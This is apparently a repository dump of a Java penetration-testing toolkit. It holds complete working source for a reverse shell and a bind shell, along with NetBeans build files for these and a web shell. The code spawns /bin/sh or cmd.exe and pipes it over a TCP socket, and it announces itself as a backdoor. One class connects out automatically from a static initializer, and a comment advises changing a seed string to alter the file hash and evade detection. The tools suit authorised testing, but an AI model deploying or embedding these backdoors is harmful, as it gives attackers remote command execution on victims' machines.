17 | private static InetSocketAddress addr = new InetSocketAddress("127.0.0.1", 9000);
18 | private static String os = null;
19 | private static String shell = null;
20 | private static byte[] buffer = null;
21 | private static int clen = 0;
22 | private static boolean error = false;
23 |
24 | private static boolean detect() {
25 | boolean detected = true;
26 | os = System.getProperty("os.name").toUpperCase();
27 | if (os.contains("LINUX") || os.contains("MAC")) {
28 | os = "LINUX";
29 | shell = "/bin/sh";
30 | } else if (os.contains("WIN")) {
31 | os = "WINDOWS";
32 | shell = "cmd.exe";
33 | } else {
34 | detected = false;
35 | System.out.print("SYS_ERROR: Underlying operating system is not supported, program will now exit...\n");
36 | }
37 | return detected;
38 | }
39 |
40 | // strings in Java are immutable, so we need to avoid using them to minimize the data in memory
41 | private static void brw(InputStream input, OutputStream output, String iname, String oname) {
42 | int bytes = 0;
43 | try {
44 | do {
45 | if (os.equals("WINDOWS") && iname.equals("STDOUT") && clen > 0) {
46 | // for some reason Windows OS pipes STDIN into STDOUT
47 | // we do not like that
48 | // we need to discard the data from the stream
49 | do {
50 | bytes = input.read(buffer, 0, clen >= buffer.length ? buffer.length : clen);
51 | clen -= clen >= buffer.length ? buffer.length : clen;
52 | } while (bytes > 0 && clen > 0);
53 | } else {
54 | bytes = input.read(buffer, 0, buffer.length);
55 | if (bytes > 0) {
56 | output.write(buffer, 0, bytes);
57 | output.flush();
58 | if (os.equals("WINDOWS") && oname.equals("STDIN")) {
59 | clen += bytes;
60 | }
61 | } else if (iname.equals("SOCKET")) {
62 | error = true;
63 | System.out.print("SOC_ERROR: Shell connection has been terminated\n\n");
64 | }
65 | }
66 | } while (input.available() > 0);
67 | } catch (SocketTimeoutException ex) {} catch (IOException ex) {
68 | error = true;
69 | System.out.print(String.format("STRM_ERROR: Cannot read from %s or write to %s, program will now exit...\n\n", iname, oname));
70 | }
71 | }
72 |
73 | public static void run() {
74 | if (detect()) {
75 | Socket client = null;
76 | OutputStream socin = null;
77 | InputStream socout = null;
78 |
79 | Process process = null;
80 | OutputStream stdin = null;
81 | InputStream stdout = null;
82 | InputStream stderr = null;
83 |
84 | try {
85 | client = new Socket();
86 | client.setSoTimeout(100);
87 | client.connect(addr);
88 | socin = client.getOutputStream();
89 | socout = client.getInputStream();
90 |
91 | buffer = new byte[1024];
92 |
93 | process = new ProcessBuilder(shell).redirectInput(ProcessBuilder.Redirect.PIPE).redirectOutput(ProcessBuilder.Redirect.PIPE).redirectError(ProcessBuilder.Redirect.PIPE).start();
94 | stdin = process.getOutputStream();
95 | stdout = process.getInputStream();
96 | stderr = process.getErrorStream();
97 |
98 | System.out.print("Backdoor is up and running...\n\n");
99 | do {
100 | if (!process.isAlive()) {
101 | System.out.print("PROC_ERROR: Shell process has been terminated\n\n"); break;
102 | }
103 | brw(socout, stdin, "SOCKET", "STDIN");
104 | if (stderr.available() > 0) { brw(stderr, socin, "STDERR", "SOCKET"); }
105 | if (stdout.available() > 0) { brw(stdout, socin, "STDOUT", "SOCKET"); }
106 | } while (!error);
107 | System.out.print("Backdoor will now exit...\n");
108 | } catch (IOException ex) {
109 | System.out.print(String.format("ERROR: %s\n", ex.getMessage()));
110 | } finally {
111 | if (stdin != null) { try { stdin.close() ; } catch (IOException ex) {} }
112 | if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} }
113 | if (stderr != null) { try { stderr.close(); } catch (IOException ex) {} }
114 | if (process != null) { process.destroy(); }
115 |
116 | if (socin != null) { try { socin.close() ; } catch (IOException ex) {} }
117 | if (socout != null) { try { socout.close(); } catch (IOException ex) {} }
118 | if (client != null) { try { client.close(); } catch (IOException ex) {} }
119 |
120 | if (buffer != null) { Arrays.fill(buffer, (byte)0); }
121 | }
122 | }
123 | }
124 |
125 | static {
126 | run();
127 | System.gc();
128 | }
129 |
130 | }
131 |
--------------------------------------------------------------------------------
/src/Bind Shell/build.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 | Builds, tests, and runs the project Bind Shell.
12 |
13 |
73 |
74 |
--------------------------------------------------------------------------------
/src/Bind Shell/manifest.mf:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | X-COMMENT: Main-Class will be added automatically by build
3 |
4 |
--------------------------------------------------------------------------------
/src/Bind Shell/nbproject/genfiles.properties:
--------------------------------------------------------------------------------
1 | build.xml.data.CRC32=77abda24
2 | build.xml.script.CRC32=35915082
3 | build.xml.stylesheet.CRC32=f85dc8f2@1.97.0.48
4 | # This file is used by a NetBeans-based IDE to track changes in generated files such as build-impl.xml.
5 | # Do not edit this file. You may delete it but then the IDE will never regenerate such files for you.
6 | nbproject/build-impl.xml.data.CRC32=77abda24
7 | nbproject/build-impl.xml.script.CRC32=97bfe66b
8 | nbproject/build-impl.xml.stylesheet.CRC32=12e0a6c2@1.106.0.48
9 |
--------------------------------------------------------------------------------
/src/Bind Shell/nbproject/project.properties:
--------------------------------------------------------------------------------
1 | annotation.processing.enabled=true
2 | annotation.processing.enabled.in.editor=false
3 | annotation.processing.processors.list=
4 | annotation.processing.run.all.processors=true
5 | annotation.processing.source.output=${build.generated.sources.dir}/ap-source-output
6 | application.title=Bind Shell
7 | application.vendor=W10
8 | build.classes.dir=${build.dir}/classes
9 | build.classes.excludes=**/*.java,**/*.form
10 | # This directory is removed when the project is cleaned:
11 | build.dir=build
12 | build.generated.dir=${build.dir}/generated
13 | build.generated.sources.dir=${build.dir}/generated-sources
14 | # Only compile against the classpath explicitly listed here:
15 | build.sysclasspath=ignore
16 | build.test.classes.dir=${build.dir}/test/classes
17 | build.test.results.dir=${build.dir}/test/results
18 | # Uncomment to specify the preferred debugger connection transport:
19 | #debug.transport=dt_socket
20 | debug.classpath=\
21 | ${run.classpath}
22 | debug.modulepath=\
23 | ${run.modulepath}
24 | debug.test.classpath=\
25 | ${run.test.classpath}
26 | debug.test.modulepath=\
27 | ${run.test.modulepath}
28 | # Files in build.classes.dir which should be excluded from distribution jar
29 | dist.archive.excludes=
30 | # This directory is removed when the project is cleaned:
31 | dist.dir=dist
32 | dist.jar=${dist.dir}/Bind_Shell.jar
33 | dist.javadoc.dir=${dist.dir}/javadoc
34 | dist.jlink.dir=${dist.dir}/jlink
35 | dist.jlink.output=${dist.jlink.dir}/Bind_Shell
36 | endorsed.classpath=
37 | excludes=
38 | includes=**
39 | jar.compress=false
40 | javac.classpath=
41 | # Space-separated list of extra javac options
42 | javac.compilerargs=
43 | javac.deprecation=false
44 | javac.external.vm=true
45 | javac.modulepath=
46 | javac.processormodulepath=
47 | javac.processorpath=\
48 | ${javac.classpath}
49 | javac.source=1.8
50 | javac.target=1.8
51 | javac.test.classpath=\
52 | ${javac.classpath}:\
53 | ${build.classes.dir}
54 | javac.test.modulepath=\
55 | ${javac.modulepath}
56 | javac.test.processorpath=\
57 | ${javac.test.classpath}
58 | javadoc.additionalparam=
59 | javadoc.author=false
60 | javadoc.encoding=${source.encoding}
61 | javadoc.html5=false
62 | javadoc.noindex=false
63 | javadoc.nonavbar=false
64 | javadoc.notree=false
65 | javadoc.private=false
66 | javadoc.splitindex=true
67 | javadoc.use=true
68 | javadoc.version=false
69 | javadoc.windowtitle=
70 | # The jlink additional root modules to resolve
71 | jlink.additionalmodules=
72 | # The jlink additional command line parameters
73 | jlink.additionalparam=
74 | jlink.launcher=true
75 | jlink.launcher.name=Bind_Shell
76 | main.class=bind.shell.BindShell
77 | manifest.file=manifest.mf
78 | meta.inf.dir=${src.dir}/META-INF
79 | mkdist.disabled=false
80 | platform.active=default_platform
81 | run.classpath=\
82 | ${javac.classpath}:\
83 | ${build.classes.dir}
84 | # Space-separated list of JVM arguments used when running the project.
85 | # You may also define separate properties like run-sys-prop.name=value instead of -Dname=value.
86 | # To set system properties for unit tests define test-sys-prop.name=value:
87 | run.jvmargs=
88 | run.modulepath=\
89 | ${javac.modulepath}
90 | run.test.classpath=\
91 | ${javac.test.classpath}:\
92 | ${build.test.classes.dir}
93 | run.test.modulepath=\
94 | ${javac.test.modulepath}
95 | source.encoding=UTF-8
96 | src.dir=src
97 | test.src.dir=test
98 |
--------------------------------------------------------------------------------
/src/Bind Shell/nbproject/project.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | org.netbeans.modules.java.j2seproject
4 |
5 |
6 | Bind Shell
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/src/Bind Shell/src/bind/shell/BindShell.java:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2021 Ivan Šincek
2 | // Requires Java SE v8 or greater and JDK v8 or greater.
3 | // Works on Linux OS, macOS, and Windows OS.
4 | package bind.shell;
5 |
6 | import java.io.IOException;
7 | import java.io.InputStream;
8 | import java.io.OutputStream;
9 | import java.net.ServerSocket;
10 | import java.net.Socket;
11 | import java.net.SocketTimeoutException;
12 | import java.util.Arrays;
13 |
14 | public class BindShell {
15 |
16 | // NOTE: Change seed to help you change the file hash.
17 | private String seed = "3301Kira";
18 | private int port = -1;
19 | private String os = null;
20 | private String shell = null;
21 | private byte[] buffer = null;
22 | private int clen = 0;
23 | private boolean error = false;
24 |
25 | public BindShell(int port) {
26 | this.port = port;
27 | }
28 |
29 | private boolean detect() {
30 | boolean detected = true;
31 | this.os = System.getProperty("os.name").toUpperCase();
32 | if (this.os.contains("LINUX") || this.os.contains("MAC")) {
33 | this.os = "LINUX";
34 | this.shell = "/bin/sh";
35 | } else if (this.os.contains("WIN")) {
36 | this.os = "WINDOWS";
37 | this.shell = "cmd.exe";
38 | } else {
39 | detected = false;
40 | System.out.print("SYS_ERROR: Underlying operating system is not supported, program will now exit...\n");
41 | }
42 | return detected;
43 | }
44 |
45 | // strings in Java are immutable, so we need to avoid using them to minimize the data in memory
46 | private void brw(InputStream input, OutputStream output, String iname, String oname) {
47 | int bytes = 0;
48 | try {
49 | do {
50 | if (this.os.equals("WINDOWS") && iname.equals("STDOUT") && this.clen > 0) {
51 | // for some reason Windows OS pipes STDIN into STDOUT
52 | // we do not like that
53 | // we need to discard the data from the stream
54 | do {
55 | bytes = input.read(this.buffer, 0, this.clen >= this.buffer.length ? this.buffer.length : this.clen);
56 | this.clen -= this.clen >= this.buffer.length ? this.buffer.length : this.clen;
57 | } while (bytes > 0 && this.clen > 0);
58 | } else {
59 | bytes = input.read(this.buffer, 0, this.buffer.length);
60 | if (bytes > 0) {
61 | output.write(this.buffer, 0, bytes);
62 | output.flush();
63 | if (this.os.equals("WINDOWS") && oname.equals("STDIN")) {
64 | this.clen += bytes;
65 | }
66 | } else if (iname.equals("SOCKET")) {
67 | this.error = true;
68 | System.out.print("SOC_ERROR: Shell connection has been terminated\n\n");
69 | }
70 | }
71 | } while (input.available() > 0);
72 | } catch (SocketTimeoutException ex) {} catch (IOException ex) {
73 | this.error = true;
74 | System.out.print(String.format("STRM_ERROR: Cannot read from %s or write to %s, program will now exit...\n\n", iname, oname));
75 | }
76 | }
77 |
78 | public void run() {
79 | if (this.detect()) {
80 | ServerSocket listener = null;
81 |
82 | Socket client = null;
83 | OutputStream socin = null;
84 | InputStream socout = null;
85 |
86 | Process process = null;
87 | OutputStream stdin = null;
88 | InputStream stdout = null;
89 | InputStream stderr = null;
90 |
91 | System.out.print("Backdoor is up and running...\n\n");
92 | System.out.print("Waiting for client to connect...\n\n");
93 | try {
94 | listener = new ServerSocket(this.port);
95 | do {
96 | client = listener.accept();
97 | } while (client == null);
98 | client.setSoTimeout(100);
99 | socin = client.getOutputStream();
100 | socout = client.getInputStream();
101 |
102 | this.buffer = new byte[1024];
103 |
104 | process = new ProcessBuilder(this.shell).redirectInput(ProcessBuilder.Redirect.PIPE).redirectOutput(ProcessBuilder.Redirect.PIPE).redirectError(ProcessBuilder.Redirect.PIPE).start();
105 | stdin = process.getOutputStream();
106 | stdout = process.getInputStream();
107 | stderr = process.getErrorStream();
108 |
109 | System.out.print("Client has connected!\n\n");
110 | do {
111 | if (!process.isAlive()) {
112 | System.out.print("PROC_ERROR: Shell process has been terminated\n\n"); break;
113 | }
114 | this.brw(socout, stdin, "SOCKET", "STDIN");
115 | if (stderr.available() > 0) { this.brw(stderr, socin, "STDERR", "SOCKET"); }
116 | if (stdout.available() > 0) { this.brw(stdout, socin, "STDOUT", "SOCKET"); }
117 | } while (!this.error);
118 | System.out.print("Client has disconnected!\n");
119 | } catch (IOException ex) {
120 | System.out.print(String.format("ERROR: %s\n", ex.getMessage()));
121 | } finally {
122 | if (stdin != null) { try { stdin.close() ; } catch (IOException ex) {} }
123 | if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} }
124 | if (stderr != null) { try { stderr.close(); } catch (IOException ex) {} }
125 | if (process != null) { process.destroy(); }
126 |
127 | if (socin != null) { try { socin.close() ; } catch (IOException ex) {} }
128 | if (socout != null) { try { socout.close(); } catch (IOException ex) {} }
129 | if (client != null) { try { client.close(); } catch (IOException ex) {} }
130 |
131 | if (this.buffer != null) { Arrays.fill(this.buffer, (byte)0); }
132 |
133 | if (listener != null) { try { listener.close(); } catch (IOException ex) {} }
134 | }
135 | }
136 | }
137 |
138 | public static void main(String[] args) {
139 | System.out.print("Java Bind TCP v3.0 by Ivan Sincek.\n");
140 | System.out.print("GitHub repository at github.com/ivan-sincek/java-reverse-tcp.\n");
141 | if (args.length != 1) {
142 | System.out.print("Usage: java -jar Bind_Shell.jar \n");
143 | } else {
144 | boolean error = false;
145 | int port = -1;
146 | args[0] = args[0].trim();
147 | if (args[0].length() < 1) {
148 | error = true;
149 | System.out.print("Port number is required\n");
150 | } else {
151 | try {
152 | port = Integer.parseInt(args[0]);
153 | if (port < 0 || port > 65535) {
154 | error = true;
155 | System.out.print("Port number is out of range\n");
156 | }
157 | } catch (NumberFormatException ex) {
158 | error = true;
159 | System.out.print("Port number is not valid\n");
160 | }
161 | }
162 | if (!error) {
163 | BindShell sh = new BindShell(port);
164 | sh.run();
165 | sh = null;
166 | System.gc();
167 | }
168 | }
169 | }
170 |
171 | }
172 |
--------------------------------------------------------------------------------
/src/Reverse Shell/build.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 | Builds, tests, and runs the project Reverse Shell.
12 |
13 |
73 |
74 |
--------------------------------------------------------------------------------
/src/Reverse Shell/manifest.mf:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | X-COMMENT: Main-Class will be added automatically by build
3 |
4 |
--------------------------------------------------------------------------------
/src/Reverse Shell/nbproject/genfiles.properties:
--------------------------------------------------------------------------------
1 | build.xml.data.CRC32=1c441c1a
2 | build.xml.script.CRC32=1840a205
3 | build.xml.stylesheet.CRC32=f85dc8f2@1.97.0.48
4 | # This file is used by a NetBeans-based IDE to track changes in generated files such as build-impl.xml.
5 | # Do not edit this file. You may delete it but then the IDE will never regenerate such files for you.
6 | nbproject/build-impl.xml.data.CRC32=1c441c1a
7 | nbproject/build-impl.xml.script.CRC32=fcb02f45
8 | nbproject/build-impl.xml.stylesheet.CRC32=12e0a6c2@1.106.0.48
9 |
--------------------------------------------------------------------------------
/src/Reverse Shell/nbproject/project.properties:
--------------------------------------------------------------------------------
1 | annotation.processing.enabled=true
2 | annotation.processing.enabled.in.editor=false
3 | annotation.processing.processors.list=
4 | annotation.processing.run.all.processors=true
5 | annotation.processing.source.output=${build.generated.sources.dir}/ap-source-output
6 | application.title=Reverse Shell
7 | application.vendor=Kira
8 | build.classes.dir=${build.dir}/classes
9 | build.classes.excludes=**/*.java,**/*.form
10 | # This directory is removed when the project is cleaned:
11 | build.dir=build
12 | build.generated.dir=${build.dir}/generated
13 | build.generated.sources.dir=${build.dir}/generated-sources
14 | # Only compile against the classpath explicitly listed here:
15 | build.sysclasspath=ignore
16 | build.test.classes.dir=${build.dir}/test/classes
17 | build.test.results.dir=${build.dir}/test/results
18 | # Uncomment to specify the preferred debugger connection transport:
19 | #debug.transport=dt_socket
20 | debug.classpath=\
21 | ${run.classpath}
22 | debug.modulepath=\
23 | ${run.modulepath}
24 | debug.test.classpath=\
25 | ${run.test.classpath}
26 | debug.test.modulepath=\
27 | ${run.test.modulepath}
28 | # Files in build.classes.dir which should be excluded from distribution jar
29 | dist.archive.excludes=
30 | # This directory is removed when the project is cleaned:
31 | dist.dir=dist
32 | dist.jar=${dist.dir}/Reverse_Shell.jar
33 | dist.javadoc.dir=${dist.dir}/javadoc
34 | dist.jlink.dir=${dist.dir}/jlink
35 | dist.jlink.output=${dist.jlink.dir}/Reverse_Shell
36 | endorsed.classpath=
37 | excludes=
38 | includes=**
39 | jar.compress=false
40 | javac.classpath=
41 | # Space-separated list of extra javac options
42 | javac.compilerargs=
43 | javac.deprecation=false
44 | javac.external.vm=true
45 | javac.modulepath=
46 | javac.processormodulepath=
47 | javac.processorpath=\
48 | ${javac.classpath}
49 | javac.source=1.8
50 | javac.target=1.8
51 | javac.test.classpath=\
52 | ${javac.classpath}:\
53 | ${build.classes.dir}
54 | javac.test.modulepath=\
55 | ${javac.modulepath}
56 | javac.test.processorpath=\
57 | ${javac.test.classpath}
58 | javadoc.additionalparam=
59 | javadoc.author=false
60 | javadoc.encoding=${source.encoding}
61 | javadoc.html5=false
62 | javadoc.noindex=false
63 | javadoc.nonavbar=false
64 | javadoc.notree=false
65 | javadoc.private=false
66 | javadoc.splitindex=true
67 | javadoc.use=true
68 | javadoc.version=false
69 | javadoc.windowtitle=
70 | # The jlink additional root modules to resolve
71 | jlink.additionalmodules=
72 | # The jlink additional command line parameters
73 | jlink.additionalparam=
74 | jlink.launcher=true
75 | jlink.launcher.name=Reverse_Shell
76 | main.class=reverse.shell.ReverseShell
77 | manifest.file=manifest.mf
78 | meta.inf.dir=${src.dir}/META-INF
79 | mkdist.disabled=false
80 | platform.active=default_platform
81 | run.classpath=\
82 | ${javac.classpath}:\
83 | ${build.classes.dir}
84 | # Space-separated list of JVM arguments used when running the project.
85 | # You may also define separate properties like run-sys-prop.name=value instead of -Dname=value.
86 | # To set system properties for unit tests define test-sys-prop.name=value:
87 | run.jvmargs=
88 | run.modulepath=\
89 | ${javac.modulepath}
90 | run.test.classpath=\
91 | ${javac.test.classpath}:\
92 | ${build.test.classes.dir}
93 | run.test.modulepath=\
94 | ${javac.test.modulepath}
95 | source.encoding=UTF-8
96 | src.dir=src
97 | test.src.dir=test
98 |
--------------------------------------------------------------------------------
/src/Reverse Shell/nbproject/project.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | org.netbeans.modules.java.j2seproject
4 |
5 |
6 | Reverse Shell
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/src/Reverse Shell/src/reverse/shell/ReverseShell.java:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2021 Ivan Šincek
2 | // Requires Java SE v8 or greater and JDK v8 or greater.
3 | // Works on Linux OS, macOS, and Windows OS.
4 | package reverse.shell;
5 |
6 | import java.io.IOException;
7 | import java.io.InputStream;
8 | import java.io.OutputStream;
9 | import java.net.InetSocketAddress;
10 | import java.net.Socket;
11 | import java.net.SocketTimeoutException;
12 | import java.util.Arrays;
13 |
14 | public class ReverseShell {
15 |
16 | // NOTE: Change seed to help you change the file hash.
17 | private String seed = "3301Kira";
18 | private InetSocketAddress addr = null;
19 | private String os = null;
20 | private String shell = null;
21 | private byte[] buffer = null;
22 | private int clen = 0;
23 | private boolean error = false;
24 |
25 | public ReverseShell(String addr, int port) {
26 | this.addr = new InetSocketAddress(addr, port);
27 | }
28 |
29 | private boolean detect() {
30 | boolean detected = true;
31 | this.os = System.getProperty("os.name").toUpperCase();
32 | if (this.os.contains("LINUX") || this.os.contains("MAC")) {
33 | this.os = "LINUX";
34 | this.shell = "/bin/sh";
35 | } else if (this.os.contains("WIN")) {
36 | this.os = "WINDOWS";
37 | this.shell = "cmd.exe";
38 | } else {
39 | detected = false;
40 | System.out.print("SYS_ERROR: Underlying operating system is not supported, program will now exit...\n");
41 | }
42 | return detected;
43 | }
44 |
45 | // strings in Java are immutable, so we need to avoid using them to minimize the data in memory
46 | private void brw(InputStream input, OutputStream output, String iname, String oname) {
47 | int bytes = 0;
48 | try {
49 | do {
50 | if (this.os.equals("WINDOWS") && iname.equals("STDOUT") && this.clen > 0) {
51 | // for some reason Windows OS pipes STDIN into STDOUT
52 | // we do not like that
53 | // we need to discard the data from the stream
54 | do {
55 | bytes = input.read(this.buffer, 0, this.clen >= this.buffer.length ? this.buffer.length : this.clen);
56 | this.clen -= this.clen >= this.buffer.length ? this.buffer.length : this.clen;
57 | } while (bytes > 0 && this.clen > 0);
58 | } else {
59 | bytes = input.read(this.buffer, 0, this.buffer.length);
60 | if (bytes > 0) {
61 | output.write(this.buffer, 0, bytes);
62 | output.flush();
63 | if (this.os.equals("WINDOWS") && oname.equals("STDIN")) {
64 | this.clen += bytes;
65 | }
66 | } else if (iname.equals("SOCKET")) {
67 | this.error = true;
68 | System.out.print("SOC_ERROR: Shell connection has been terminated\n\n");
69 | }
70 | }
71 | } while (input.available() > 0);
72 | } catch (SocketTimeoutException ex) {} catch (IOException ex) {
73 | this.error = true;
74 | System.out.print(String.format("STRM_ERROR: Cannot read from %s or write to %s, program will now exit...\n\n", iname, oname));
75 | }
76 | }
77 |
78 | public void run() {
79 | if (this.detect()) {
80 | Socket client = null;
81 | OutputStream socin = null;
82 | InputStream socout = null;
83 |
84 | Process process = null;
85 | OutputStream stdin = null;
86 | InputStream stdout = null;
87 | InputStream stderr = null;
88 |
89 | try {
90 | client = new Socket();
91 | client.setSoTimeout(100);
92 | client.connect(this.addr);
93 | socin = client.getOutputStream();
94 | socout = client.getInputStream();
95 |
96 | this.buffer = new byte[1024];
97 |
98 | process = new ProcessBuilder(this.shell).redirectInput(ProcessBuilder.Redirect.PIPE).redirectOutput(ProcessBuilder.Redirect.PIPE).redirectError(ProcessBuilder.Redirect.PIPE).start();
99 | stdin = process.getOutputStream();
100 | stdout = process.getInputStream();
101 | stderr = process.getErrorStream();
102 |
103 | System.out.print("Backdoor is up and running...\n\n");
104 | do {
105 | if (!process.isAlive()) {
106 | System.out.print("PROC_ERROR: Shell process has been terminated\n\n"); break;
107 | }
108 | this.brw(socout, stdin, "SOCKET", "STDIN");
109 | if (stderr.available() > 0) { this.brw(stderr, socin, "STDERR", "SOCKET"); }
110 | if (stdout.available() > 0) { this.brw(stdout, socin, "STDOUT", "SOCKET"); }
111 | } while (!this.error);
112 | System.out.print("Backdoor will now exit...\n");
113 | } catch (IOException ex) {
114 | System.out.print(String.format("ERROR: %s\n", ex.getMessage()));
115 | } finally {
116 | if (stdin != null) { try { stdin.close() ; } catch (IOException ex) {} }
117 | if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} }
118 | if (stderr != null) { try { stderr.close(); } catch (IOException ex) {} }
119 | if (process != null) { process.destroy(); }
120 |
121 | if (socin != null) { try { socin.close() ; } catch (IOException ex) {} }
122 | if (socout != null) { try { socout.close(); } catch (IOException ex) {} }
123 | if (client != null) { try { client.close(); } catch (IOException ex) {} }
124 |
125 | if (this.buffer != null) { Arrays.fill(this.buffer, (byte)0); }
126 | }
127 | }
128 | }
129 |
130 | public static void main(String[] args) {
131 | System.out.print("Java Reverse TCP v3.0 by Ivan Sincek.\n");
132 | System.out.print("GitHub repository at github.com/ivan-sincek/java-reverse-tcp.\n");
133 | if (args.length != 2) {
134 | System.out.print("Usage: java -jar Reverse_Shell.jar \n");
135 | } else {
136 | boolean error = false;
137 | args[0] = args[0].trim();
138 | if (args[0].length() < 1) {
139 | error = true;
140 | System.out.print("Address is required\n");
141 | }
142 | int port = -1;
143 | args[1] = args[1].trim();
144 | if (args[1].length() < 1) {
145 | error = true;
146 | System.out.print("Port number is required\n");
147 | } else {
148 | try {
149 | port = Integer.parseInt(args[1]);
150 | if (port < 0 || port > 65535) {
151 | error = true;
152 | System.out.print("Port number is out of range\n");
153 | }
154 | } catch (NumberFormatException ex) {
155 | error = true;
156 | System.out.print("Port number is not valid\n");
157 | }
158 | }
159 | if (!error) {
160 | ReverseShell sh = new ReverseShell(args[0], port);
161 | sh.run();
162 | sh = null;
163 | System.gc();
164 | }
165 | }
166 | }
167 |
168 | }
169 |
--------------------------------------------------------------------------------
/src/Web Shell/build.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 | Builds, tests, and runs the project Web Shell.
12 |
13 |
71 |
72 |
--------------------------------------------------------------------------------
/src/Web Shell/nbproject/ant-deploy.xml:
--------------------------------------------------------------------------------
1 |
2 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
68 |
69 |
70 |
--------------------------------------------------------------------------------
/src/Web Shell/nbproject/build-impl.xml:
--------------------------------------------------------------------------------
1 |
2 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 |
197 |
198 |
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 |
221 |
222 |
223 |
224 |
225 |
226 |
227 |
228 |
229 |
230 |
231 |
232 |
233 |
234 |
235 |
236 |
237 | Must set src.dir
238 | Must set test.src.dir
239 | Must set build.dir
240 | Must set build.web.dir
241 | Must set build.generated.dir
242 | Must set dist.dir
243 | Must set build.classes.dir
244 | Must set dist.javadoc.dir
245 | Must set build.test.classes.dir
246 | Must set build.test.results.dir
247 | Must set build.classes.excludes
248 | Must set dist.war
249 |
250 |
251 |
252 |
253 |
254 |
255 |
256 |
257 |
258 | The Java EE server classpath is not correctly set up - server home directory is missing.
259 | Either open the project in the IDE and assign the server or setup the server classpath manually.
260 | For example like this:
261 | ant -Dj2ee.server.home=<app_server_installation_directory>
262 |
263 |
264 | The Java EE server classpath is not correctly set up. Your active server type is ${j2ee.server.type}.
265 | Either open the project in the IDE and assign the server or setup the server classpath manually.
266 | For example like this:
267 | ant -Duser.properties.file=<path_to_property_file> (where you put the property "j2ee.platform.classpath" in a .properties file)
268 | or ant -Dj2ee.platform.classpath=<server_classpath> (where no properties file is used)
269 |
270 |
271 |
272 |
273 |
274 |
275 |
276 |
277 |
278 |
279 |
280 |
281 |
282 |
283 |
284 |
285 |
286 |
287 |
288 |
289 |
290 |
291 |
292 |
293 |
294 |
295 |
296 |
297 |
298 |
299 |
300 |
301 |
302 |
303 |
304 |
305 |
306 |
307 |
308 |
309 |
310 |
311 |
312 |
313 |
314 |
315 |
316 |
317 |
318 |
319 |
320 |
321 |
322 |
323 |
324 |
325 |
326 |
327 |
328 |
329 |
330 |
331 |
332 |
333 |
334 |
335 |
336 |
337 |
338 |
339 |
340 |
341 |
342 |
343 |
344 |
345 |
346 |
347 |
348 |
349 |
350 |
351 |
352 |
353 |
354 |
355 |
356 |
357 |
358 |
359 |
360 |
361 |
362 |
363 |
364 |
365 | Must set javac.includes
366 |
367 |
368 |
369 |
370 |
371 |
372 |
373 |
374 |
375 |
376 |
377 |
378 |
379 |
380 |
381 |
382 |
383 |
384 |
385 |
386 |
387 |
388 |
389 |
390 |
391 |
392 |
393 |
394 |
395 |
396 |
397 |
398 |
399 |
400 |
401 |
402 |
403 |
404 |
405 |
406 |
407 |
408 |
409 |
410 |
411 |
412 |
413 |
414 |
415 |
416 |
417 |
418 |
419 |
420 |
421 |
422 |
423 |
424 |
425 |
426 |
427 |
428 |
429 |
430 |
431 |
432 |
433 |
434 |
435 |
436 |
437 |
438 |
439 |
440 |
441 |
442 |
443 |
444 |
445 |
446 |
447 |
448 |
449 |
450 |
451 |
452 |
453 |
454 |
455 |
456 |
457 |
458 |
459 |
460 |
461 |
462 |
463 |
464 |
465 |
466 |
467 |
468 |
469 |
470 |
471 |
472 |
473 |
474 |
475 |
476 |
477 |
478 |
479 |
480 |
481 |
482 |
483 |
484 |
485 |
486 |
487 |
488 |
489 |
490 |
491 |
492 | No tests executed.
493 |
494 |
495 |
496 |
497 |
498 |
499 |
500 |
501 |
502 |
503 |
504 |
505 |
506 |
507 |
508 |
509 |
510 |
511 |
512 |
513 |
514 |
515 |
516 |
517 |
518 |
519 |
520 |
521 |
522 |
523 |
524 |
